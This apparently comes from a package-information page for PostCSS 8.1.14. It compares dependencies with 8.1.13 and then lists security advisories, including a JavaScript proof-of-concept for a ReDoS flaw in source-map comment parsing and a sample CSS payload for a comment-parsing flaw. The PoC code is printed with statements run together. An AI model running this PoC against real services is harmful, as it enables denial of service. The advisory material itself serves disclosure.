PostCSS 8.1.14 is a minor update to the popular CSS transformation tool, following closely on the heels of version 8.1.13. Both versions maintain the core functionality that developers rely on for modernizing CSS workflows via JavaScript plugins. Examining the provided data, the primary difference lies in the dependencies. While version 8.1.13 included vfile-location as a dependency, version 8.1.14 has removed it. This could indicate the removal of a specific feature reliant on vfile-location, a shift in how location information is handled, or perhaps an optimization eliminating the need for the dependency.
Both versions rely on nanoid for generating unique IDs, colorette for colorizing terminal output, and source-map for debugging support, ensuring a consistent development experience. The file count within the distributed tarball remains consistent at 48, but the unpacked size has slightly increased from 199183 to 199843 suggesting some internal changes or modifications although the dependency list is shorter.
Developers considering these versions should be aware of the dependency change. If your PostCSS configuration explicitly relies on functionality directly linked to vfile-location (if applicable to a plugin you may be using), the update to 8.1.14 might require adjustments. If not, the update to 8.1.14 is likely to be a seamless transition, potentially offering performance improvements or bug fixes inherent in the updated codebase that are not immediately obvious from the package metadata. Regardless, both versions provide a robust platform for leveraging the power of PostCSS within your projects, aligning with the MIT license and supported by Andrey Sitnik and the Open Collective.
All the vulnerabilities related to the version 8.1.14 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.